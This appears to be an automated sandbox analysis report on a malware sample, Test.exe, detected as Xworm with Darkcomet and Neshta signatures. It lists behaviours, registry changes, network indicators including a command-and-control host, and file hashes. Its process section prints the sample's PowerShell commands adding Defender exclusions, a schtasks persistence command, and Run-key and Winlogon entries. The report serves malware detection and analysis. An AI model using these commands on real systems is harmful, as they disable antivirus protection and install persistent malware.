Analysis Overview
SHA256
b7f8446df81a5d91809436661acf8ee4fdd1c897312a494ca01fca94f5352d5b
Threat Level: Known bad
The file Test.exe was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Modifies WinLogon for persistence
Darkcomet
Modifies firewall policy service
Windows security bypass
Modifies visibility of file extensions in Explorer
Xworm family
Xworm
Detect Xworm Payload
Neshta
Detect Neshta payload
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Boot or Logon Autostart Execution: Active Setup
Executes dropped EXE
Modifies system executable filetype association
Reads user/profile data of web browsers
Windows security modification
Checks computer location settings
Uses the VBS compiler for execution
Drops startup file
Adds Run key to start application
Enumerates connected drives
Looks up external IP address via web service
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Modifies Control Panel
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies Internet Explorer settings
Scheduled Task/Job: Scheduled Task
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Kills process with taskkill
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer start page
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-07-15 09:12
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-15 09:12
Reported
2024-07-15 09:18
Platform
win7-20240708-en
Max time kernel
329s
Max time network
318s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Test.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {BC049129-3B35-443C-83BD-9395177DA58D} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | edition-ages.gl.at.ply.gg | udp |
| US | 147.185.221.21:14076 | edition-ages.gl.at.ply.gg | tcp |
Files
memory/536-0-0x000007FEF57B3000-0x000007FEF57B4000-memory.dmp
memory/536-1-0x0000000000AF0000-0x0000000000B08000-memory.dmp
memory/536-2-0x000007FEF57B0000-0x000007FEF619C000-memory.dmp
memory/2780-7-0x00000000028B0000-0x0000000002930000-memory.dmp
memory/2780-8-0x000000001B560000-0x000000001B842000-memory.dmp
memory/2780-9-0x00000000022C0000-0x00000000022C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 641a98ca640a5042ffb70741769cbcc4 |
| SHA1 | 09af0432501c2176b1cdcf1da7f8ac7d07576968 |
| SHA256 | 513c298584c491da25c7d98ad0906e9dca84b782d5315829deb2a213ad744c88 |
| SHA512 | 7b21cd67b7b16b988ff6780bd7833524972f166f9bb646bcbe6a03e50bfaf39709d517f858301e9e70623f2d7bf8c8bf74898d3a3403f8c15ac3b62f08f2abbf |
memory/2824-15-0x000000001B510000-0x000000001B7F2000-memory.dmp
memory/2824-16-0x0000000000570000-0x0000000000578000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/536-32-0x000007FEF57B3000-0x000007FEF57B4000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | f9cf3c741b2aab438659db28ff3dcade |
| SHA1 | abea5f0af31f38d2df86735b0ac57a508eb36b68 |
| SHA256 | b7f8446df81a5d91809436661acf8ee4fdd1c897312a494ca01fca94f5352d5b |
| SHA512 | ff86f97a2bb44b001367655afcbb33b928c07a5ec7ce0c9449d9997c4f2b0550363c5bbc8f0a3615dc7cd6aa9f04d018b81c1e98338575bed0910a20fcd9a6eb |
memory/2520-36-0x0000000000060000-0x0000000000078000-memory.dmp
memory/536-37-0x000007FEF57B0000-0x000007FEF619C000-memory.dmp
memory/1616-40-0x0000000000300000-0x0000000000318000-memory.dmp
memory/2216-42-0x0000000000D60000-0x0000000000D78000-memory.dmp
memory/2772-44-0x00000000010E0000-0x00000000010F8000-memory.dmp
memory/1716-46-0x0000000000320000-0x0000000000338000-memory.dmp
memory/924-48-0x0000000000950000-0x0000000000968000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-15 09:12
Reported
2024-07-15 09:25
Platform
win10v2004-20240709-en
Max time kernel
696s
Max time network
783s
Command Line
Signatures
Darkcomet
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "0" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Neshta
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Xworm
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\uzdixv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Executes dropped EXE
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Windows security modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\file2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\svñhost.exe" | C:\Users\Admin\AppData\Local\Temp\MICROS~1\SVHOST~1.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Dragon\\Desktop\\trollface1.jpg" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Google\Update\DISABL~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
